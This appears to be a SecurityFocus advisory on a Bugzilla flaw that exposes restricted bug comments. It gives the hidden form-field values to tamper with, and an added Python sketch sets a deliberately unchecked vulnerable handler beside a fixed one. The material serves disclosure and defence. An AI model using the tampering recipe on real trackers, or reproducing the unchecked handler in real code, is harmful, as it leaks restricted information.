BugZilla Process_Bug.CGI Restricted Bug Comments Revealing Vulnerability

Bugzilla is the bug tracking software package by the Mozilla project.

A problem in Bugzilla has been discovered that allows remote users to gain access to restricted bug information. Upon viewing a restricted bug, the user may save the show_bug.cgi page and modify its hidden form fields to the following:

<INPUT TYPE=HIDDEN NAME="delta_ts" VALUE="19950000000000">
<INPUT TYPE=HIDDEN NAME="longdesclength" VALUE="0">
<INPUT TYPE=HIDDEN NAME="id" VALUE=bugid>

Loading the modified page and clicking Commit yields the bug's comments.
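The following is an added illustration, not Bugzilla's own code: it models the handler pattern behind this bug, a version that acts on the posted hidden fields before any access check, beside one that authorises the bug id against the stored record first. The mid-air-collision style mechanism, the Bug record, the group name and the sample data are assumptions.

```python
# Added illustration, not Bugzilla's code.  ASSUMPTION about the mechanism:
# the handler compares the posted delta_ts / longdesclength with the stored
# values and, on mismatch, shows the comments it thinks the user has not seen.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Bug:
    id: int
    delta_ts: str            # last-modified timestamp stored server-side
    comments: list
    group: Optional[str]     # None means the bug is public


# Constructed sample data: bug 42 is restricted to the "security" group.
BUGS = {
    42: Bug(42, "20010301120000",
            ["first report", "internal: credentials seen in log"], "security"),
}

# The tampered hidden fields from the advisory, posted for bug 42.
TAMPERED_FORM = {"delta_ts": "19950000000000", "longdesclength": "0", "id": "42"}


def can_see_bug(user_groups, bug):
    return bug.group is None or bug.group in user_groups


def process_bug_vulnerable(form, user_groups):
    """Derives what to show from client-controlled fields; no access check at all."""
    bug = BUGS[int(form["id"])]
    seen = int(form["longdesclength"])
    if form["delta_ts"] != bug.delta_ts or seen < len(bug.comments):
        return {"status": "midair", "new_comments": bug.comments[seen:]}
    return {"status": "ok"}


def process_bug_fixed(form, user_groups):
    """Authorise the bug id against the stored record before using any field."""
    try:
        bug = BUGS.get(int(form.get("id", "")))
    except ValueError:
        bug = None
    if bug is None or not can_see_bug(user_groups, bug):
        return {"status": "denied"}      # same reply for missing and forbidden ids
    seen = max(0, int(form["longdesclength"]))
    if form["delta_ts"] != bug.delta_ts or seen < len(bug.comments):
        return {"status": "midair", "new_comments": bug.comments[seen:]}
    return {"status": "ok"}
```

The tampered form reaches the comments through the first handler and is refused by the second, while a user who is actually in the group still gets the collision view.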

Copyright 2010, SecurityFocus